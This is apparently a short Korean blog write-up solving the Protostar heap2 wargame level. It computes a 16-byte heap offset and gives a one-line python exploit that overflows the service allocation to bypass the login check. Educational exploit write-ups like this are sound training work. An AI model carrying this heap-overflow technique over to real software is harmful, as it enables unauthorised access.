반응형
This level examines what can happen when heap pointers are stale.
This level is completed when you see the "you have logged in already!" message
This level is at /opt/protostar/bin/heap2
> ./heap2
[ auth = (nil), service = (nil) ]
auth A
[ auth = 0x804c008, service = (nil) ]
service A
[ auth = 0x804c008, service = 0x804c018 ]0x804c018 - 0x804c008 = 0x10(16진수) = 16(10진수)
16만큼의 오버플로우 필요
(python -c ‘print “auth a\n” + “service “+”A”*16 + “B\n” + “login\n”’)|./heap2반응형
'system' 카테고리의 다른 글
| [Protostar]Net 0 (0) | 2020.11.17 |
|---|---|
| [protostar]heap3.c (0) | 2020.11.17 |
| [protostar]heap1.c (0) | 2020.11.11 |
| [protostar]heap0 (0) | 2020.11.07 |
| [protostar]format4 (0) | 2020.11.05 |
